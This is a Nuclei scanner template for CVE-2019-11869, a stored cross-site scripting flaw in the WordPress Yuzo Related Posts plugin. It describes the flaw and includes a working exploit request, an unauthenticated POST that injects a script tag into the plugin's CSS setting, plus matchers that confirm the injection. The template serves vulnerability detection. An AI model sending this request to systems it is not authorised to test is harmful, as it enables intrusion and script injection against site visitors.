nuclei-templates/cves/2019/CVE-2019-11869.yaml

52 lines
1.7 KiB
YAML
Raw Normal View History

2021-01-02 04:59:06 +00:00
id: CVE-2019-11869
info:
name: WordPress Yuzo <5.12.94 - Cross-Site Scripting
author: ganofins
severity: medium
description: |
WordPress Yuzo Related Posts plugin before 5.12.94 is vulnerable to cross-site scripting
because it mistakenly expects that is_admin() verifies that the
request comes from an admin user (it actually only verifies that the
request is for an admin page). An unauthenticated attacker can consequently inject
a payload into the plugin settings, such as the
yuzo_related_post_css_and_style setting.
reference:
- https://www.wordfence.com/blog/2019/04/yuzo-related-posts-zero-day-vulnerability-exploited-in-the-wild
- https://wpscan.com/vulnerability/9254
- https://www.wordfence.com/blog/2019/04/yuzo-related-posts-zero-day-vulnerability-exploited-in-the-wild/
- https://wpvulndb.com/vulnerabilities/9254
- https://nvd.nist.gov/vuln/detail/CVE-2019-11869
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2019-11869
cwe-id: CWE-79
tags: cve,cve2019,wordpress,wp-plugin,xss
requests:
- raw:
- |
POST /wp-admin/options-general.php?page=yuzo-related-post HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
yuzo_related_post_css_and_style=</style><script>alert(0);</script>
2020-12-25 09:56:00 +00:00
- |
GET / HTTP/1.1
Host: {{Hostname}}
2021-03-11 14:17:22 +00:00
req-condition: true
matchers-condition: and
matchers:
2020-12-25 09:56:00 +00:00
- type: dsl
dsl:
2021-03-24 23:28:50 +00:00
- 'contains(body_2, "<script>alert(0);</script>")'
2020-12-25 09:56:00 +00:00
- type: dsl
dsl:
- "contains(tolower(all_headers_2), 'text/html')"
# Enhanced by mp on 2022/08/11